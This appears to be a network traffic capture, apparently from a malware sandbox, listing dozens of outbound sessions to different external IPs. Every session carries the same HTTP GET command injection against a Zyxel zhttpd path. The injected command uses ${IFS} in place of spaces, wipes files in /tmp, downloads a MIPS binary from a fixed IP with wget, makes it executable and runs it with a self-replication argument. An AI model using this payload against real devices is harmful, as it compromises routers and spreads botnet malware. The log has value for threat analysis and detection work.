                                          Jan 14, 2024 15:46:32.355163097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8363192.168.2.2345218188.116.122.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355196953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8364192.168.2.235827025.35.198.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355214119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8365192.168.2.2336814119.221.49.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355242968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8366192.168.2.2356324193.66.254.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355256081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8367192.168.2.233754292.88.243.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355281115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8368192.168.2.2344778221.69.22.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355320930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8369192.168.2.2334728113.90.32.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355348110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8370192.168.2.2350256169.43.173.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355356932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8371192.168.2.235747425.130.17.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355391026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8372192.168.2.2345014192.99.206.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355433941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8373192.168.2.2358370163.5.138.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355443954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8374192.168.2.235309424.142.175.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355479002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8375192.168.2.2346488186.107.179.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355509043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8376192.168.2.2359502201.238.127.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355515957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8377192.168.2.2341012205.146.44.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355531931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8378192.168.2.233593680.205.252.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355546951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8379192.168.2.2338864178.70.208.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355576992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8380192.168.2.2346998160.197.11.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355607986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8381192.168.2.2340704205.11.185.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355634928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8382192.168.2.2340792190.91.31.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355654001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8383192.168.2.2358142132.154.121.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355691910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8384192.168.2.233601219.175.37.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355719090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8385192.168.2.2337632189.179.4.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355736017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8386192.168.2.2356508168.36.218.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355776072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8387192.168.2.2350928119.82.52.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355809927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8388192.168.2.2351242202.62.148.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355833054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8389192.168.2.2352846193.216.233.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355860949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8390192.168.2.235617683.244.33.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355910063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8391192.168.2.2344984199.243.176.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355922937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8392192.168.2.235482871.77.95.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355922937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8393192.168.2.234052297.80.190.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355947971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8394192.168.2.2356266141.116.105.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355971098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8395192.168.2.2342504130.206.221.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356008053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8396192.168.2.2347436199.150.39.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356035948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8397192.168.2.2345332131.24.209.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356070995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8398192.168.2.2355056140.163.136.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356118917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8399192.168.2.234819094.1.26.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356122017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8400192.168.2.2356880150.155.93.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356173992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8401192.168.2.2339854182.120.9.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356199980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8402192.168.2.235572845.189.209.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356230974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8403192.168.2.233846075.109.3.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356278896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8404192.168.2.2357626112.103.243.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356287003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8405192.168.2.234356096.19.48.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356309891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8406192.168.2.233475635.233.203.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356367111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8407192.168.2.2334308102.29.248.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356380939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8408192.168.2.234625634.87.79.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356393099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8409192.168.2.2357836194.135.23.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356443882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8410192.168.2.2344550130.25.183.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356452942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8411192.168.2.235144648.32.173.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356487989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8412192.168.2.2348062219.211.236.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356503010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8413192.168.2.234634290.227.34.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356523037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8414192.168.2.2360876147.174.45.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356566906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8415192.168.2.2357600132.110.87.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356589079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8416192.168.2.235678650.81.155.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356601000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8417192.168.2.2355706116.88.146.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356646061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8418192.168.2.233568858.61.0.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356674910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8419192.168.2.2338796173.81.186.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356676102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8420192.168.2.2356632113.161.143.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356720924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8421192.168.2.233784643.76.150.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356729984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8422192.168.2.235418246.137.237.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356740952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8423192.168.2.2346250155.97.157.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356740952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8424192.168.2.235569860.45.226.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356781006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8425192.168.2.234528270.97.118.39443
                                          TimestampBytes transferredDirectionData
